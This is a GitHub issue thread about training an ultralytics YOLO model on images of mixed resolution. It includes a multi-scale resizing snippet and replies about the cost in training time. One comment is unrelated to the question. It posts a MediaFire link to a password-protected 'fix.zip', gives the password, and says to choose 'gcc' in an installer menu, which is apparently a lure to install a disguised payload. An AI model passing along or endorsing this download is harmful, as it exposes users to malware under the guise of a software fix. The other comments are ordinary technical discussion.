### ISSUE TITLE
Can I train diffetent images with different imgsz？

### ISSUE THREAD

**Issue by hbl843449791** [ultralytics/ultralytics#15860]
### Search before asking

- [X] I have searched the Ultralytics YOLO [issues](https://github.com/ultralytics/ultralytics/issues) and [discussions](https://github.com/ultralytics/ultralytics/discussions) and found no similar questions.

### Question

Such as part of the size is suitable for 640, and the other part of the training images are 4K,how to train them together？

**Comment by tongchangD** [comment]
you can set in default.py
```
multi_scale: True 
```

and change model/yolo/detect/train.py
```
        if self.args.multi_scale:
            imgs = batch["img"]
            sz = (
                random.randrange(int(self.args.imgsz * 0.7), int(self.args.imgsz * 1.25 + self.stride))
                // self.stride * self.stride
            ) 
            sf = sz / max(imgs.shape[2:])  # scale factor
            if sf != 1:
                ns = [
                    math.ceil(x * sf / self.stride) * self.stride for x in imgs.shape[2:]
                ]  # new shape (stretched to gs-multiple)
                imgs = nn.functional.interpolate(imgs, size=ns, mode="bilinear", align_corners=False)
            batch["img"] = imgs
```

**Comment by chenshupe** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by hbl843449791** [comment]
> you can set in default.py
> 
> ```
> multi_scale: True 
> ```
> 
> and change model/yolo/detect/train.py
> 
> ```
>         if self.args.multi_scale:
>             imgs = batch["img"]
>             sz = (
>                 random.randrange(int(self.args.imgsz * 0.7), int(self.args.imgsz * 1.25 + self.stride))
>                 // self.stride * self.stride
>             ) 
>             sf = sz / max(imgs.shape[2:])  # scale factor
>             if sf != 1:
>                 ns = [
>                     math.ceil(x * sf / self.stride) * self.stride for x in imgs.shape[2:]
>                 ]  # new shape (stretched to gs-multiple)
>                 imgs = nn.functional.interpolate(imgs, size=ns, mode="bilinear", align_corners=False)
>             batch["img"] = imgs
> ```

change which function？

**Comment by glenn-jocher** [comment]
@tongchangD to train images of different sizes together, you can use the `multi_scale` training feature. This allows the model to dynamically adjust the image size during training. You can enable this by setting `multi_scale: True` in your configuration file and modifying the training script as needed. For detailed steps, please refer to the provided code snippet. If you encounter any issues, ensure you're using the latest version of the Ultralytics package.

**Comment by tongchangD** [comment]
@glenn-jocher  this has some error,only resize the image size, but  not change label ,especially masks

**Comment by tongchangD** [comment]
> @glenn-jocher this has some error,only resize the image size, but not change label ,especially masks

sorry,label has resized in last step

**Comment by glenn-jocher** [comment]
Thank you for the update. If you encounter any further issues or need additional assistance, please ensure you're using the latest version of the Ultralytics package and refer to the [documentation](https://docs.ultralytics.com/modes/train/) for detailed guidance.

**Comment by hbl843449791** [comment]
@tongchangD However, this method will greatly increase the training time. Can we simply set the training setting for large-scale images?

**Comment by hbl843449791** [comment]
@tongchangD @glenn-jocher However, this method will greatly increase the training time. Can we simply set the training setting for large-scale images?

**Comment by glenn-jocher** [comment]
You can set the training image size to the largest scale you need, ensuring all images are resized accordingly. This approach avoids the complexity and overhead of multi-scale training.
